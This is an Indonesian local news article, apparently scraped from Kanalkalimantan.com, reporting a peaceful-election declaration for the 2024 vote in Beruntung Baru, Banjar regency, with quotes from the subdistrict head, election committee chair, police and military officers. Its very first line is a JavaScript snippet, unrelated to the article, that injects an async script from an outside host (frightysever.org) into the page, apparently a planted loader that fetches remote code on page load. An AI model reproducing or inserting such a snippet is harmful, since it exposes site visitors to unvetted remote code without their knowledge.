(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Pemilu 2024

Deklarasi Damai Pemilu 2024 di Kecamatan Beruntung Baru


KANALKALIMANTAN.COM, MARTAPURA – Deklarasi Damai Pemilu 2024 mewujudkan demokrasi yang bermartabat digelar di Kecamatan Beruntung Baru, Kabupaten Banjar, Kamis (23/11/2023) siang.

Tujuan Deklarasi Damai Pemilu 2024 yakni menjaga keutuhan negara Republik Indonesia, yang berdasarkan Pancasila dan UUD 1945. Menyukseskan Pemilu 2024 yang bermartabat, berintegritas, jujur, adil, dan amanah demokratis. Tunduk dan patuh pada peraturan dan perundang-undangan yang berlaku. Menolak segala bentuk penyebaran hoax, ujaran kebencian, Money Politik, Politisasi agama dan etnis.

Camat Beruntung Baru, Wahidin Noor MMPd mengatakan, ikrar Deklarasi Damai Pemilu 2024 hendaknya jangan hanya menjadi kegiatan seremonial menjelang Pemilu saja, namun harus dipahami bersama bahwa isi dan maknanya. “Dalam deklarasi tersebut merupakan pernyataan kita semua, seluruh masyarakat Kecamatan Beruntung Baru,” ujar Camat Beruntung Baru.

Itu artinya semua harus menyepakati bersama poin-poin dalam deklarasi damai dan dengan penuh kesadaran bertanggung jawab untuk melaksanakannya.

Baca juga: Perlawanan Mantan Kadistan Balangan saat Sidang Korupsi Pengadaan Sapi dan Itik, Bantah Terima Fee dari Saksi

“Dimulai dari hari ini hingga masa kampanye, hari pemilihan, penghitungan suara dan penyelesaian sengketa, hingga Pemilu 2024 nanti dinyatakan selesai, tidak ada lagi sengketa dan berbagai masalah lainnya,” tegasnya.

Ketua PPK Beruntung Baru, Ibenu Marwan SH MH sangat mengapresiasi kegiatan deklarasi damai Pemilu 2024, kolaborasi antara Polsek, Koramil, Kecamatan, PPK dan Panwas dalam rangka terlaksananya Pemilu yang aman, damai, kondusif di Beruntung Baru.

“Bersepakat untuk menjaga netralitas semua pihak dengan tidak turut serta, mendukung dan kegiatan lainnya untuk terhadap salah satu paslon, parpol maupun caleg,” tegasnya.

Baca juga: Kekeringan Masih Melanda, BPBD Banjar Pasok Air Bersih ke Mandiangin

Sekadar diketahui, saat ini sebagian logistik sudah berada di gudang logistik KPU Kabupaten Banjar, dan nanti akan dilakukan pendistribusian ke kecamatan.

Di lain pihak, Kapolsek Beruntung Baru Ipda Rudini SAP mengajak seluruh pihak dan warga Kecamatan Beruntung Baru menyukseskan Pemilu 2024 yang aman, damai, dan sejuk.

“Sebentar lagi akan dilaksanakan tahapan kampanye dimulai 28 Nopember 2023 sampai dengan 10 Februari 2024, Polsek Beruntung Baru siap melakukan pengamanan kegiatan kampanye, dan kami berharap peserta Pemilu, baik tim sukses maupun partai politik memberitahukan setiap kegiatan sesuai Peraturan KPU No 15 tahun 2024 tentang kampanye,” ujarnya.

Dia juga menghimbau kepada seluruh pihak, TNI, Polri, ASN dan penyelenggara Pemilu menjaga netralitas dalam Pemilu 2024. “Setiap permasalahan yang terjadi segera diselesaikan, jangan sampai ke tingkat kabupaten, provinsi atau nasional, lakukan komunikasi antara penyelenggara Pemilu tingkat desa dengan kecamatan,” ingatnya.

Baca juga: Jambore Akbar Kader SE Kabupaten Banjar 2023, Tampilkan Penyuluhan Kesehatan Stunting dan Pencegahan

PPK juga diminta bekerjasama dengan Puskesmas melakukan pemeriksaan kesehatan kepada petugas KPPS nanti sebelum bertugas sehingga pada saat dalam bertugas dalam keadaan kondisi fit sehingga pelaksanaan pemungutan dan penghitungan suara nantinya,”tutupnya.

Kewaspadaan juga harus kita tingkatkan di lingkungan masing-masing, karena menjelang Pemilu 2024 suhu politik akan memanas dan itu sudah terjadi di medsos. “Kita jangan mudah terpengaruh, apalagi terprovokasi, karena postingan di berbagai medsos yang belum tentu kebenarannya. Kita harus sadari bahwa kejahatan siber kini sudah menjadi modus baru para oknum yang ingin memecah belah persatuan masyarakat, apalagi menjelang Pemilu,” ujar Peltu Fahruraji dari Danposramil Kecamatan Beruntung Baru.

“Mari kita selenggarakan pesta demokrasi di daerah kita ini dengan damai, aman dan tertib. Berbeda pilihan itu sangatlah wajar dalam setiap Pemilu, bahkan dalam keluargapun bisa saling berbeda pilihan. Sikapilah perbedaan tersebut dengan rasional dan kedewasaan berdemokrasi,” pungakasnya. (Kanalkalimantan.com/nh)

Reporter: nh
Editor: bie


Risa

Recent Posts

Peluncuran Pilkada 2024 Kalsel, Jinggle “Ayo Memilih” dan Maskot Si Botan

KANALKALIMANTAN.COM, BANJARBARU - Jinggle 'Ayo Memilih' dan maskot Si Botan menandai peluncuran rangkaian pesta demokrasi… Read More

7 jam ago

Inspeksi SLO, Srikandi PLN Hadirkan Keandalan dan Kualitas Instalasi

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan… Read More

10 jam ago

Senja Jelang Magrib, Rumah di Banjar Permai III Terbakar

KANALKALIMANTAN.COM, BANJARMASIN - Warga kawasan Banjar Indah Permai geger dengan kemunculan kobaran api, Senin (27/5/2024)… Read More

11 jam ago

Lawatan ke PKB, Upaya Lisa Halaby Mencari Partai Pengusung

KANALKALIMANTAN.COM, BANJARBARU – Bakal calon Wali Kota Erna Lisa Halaby kembali melakukan lawatan politik menuju… Read More

14 jam ago

Menjaga Kamtibmas, Satgas TMMD ke-120 Berikan Penyuluhan

KANALKALIMANTAN.COM, AMUNTAI - Memberikan pemahaman kepada warga agar bersama-sama menjaga dan mewujudkan keamanan dan ketertiban… Read More

14 jam ago

RPJPD 2025-2045 Banjarbaru Menjadi Kota Metropolitan di Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Langkah menjadikan Kota Banjarbaru sebagai kota metropolitan di Provinsi Kalimantan Selatan (Kalsel)… Read More

14 jam ago

This website uses cookies.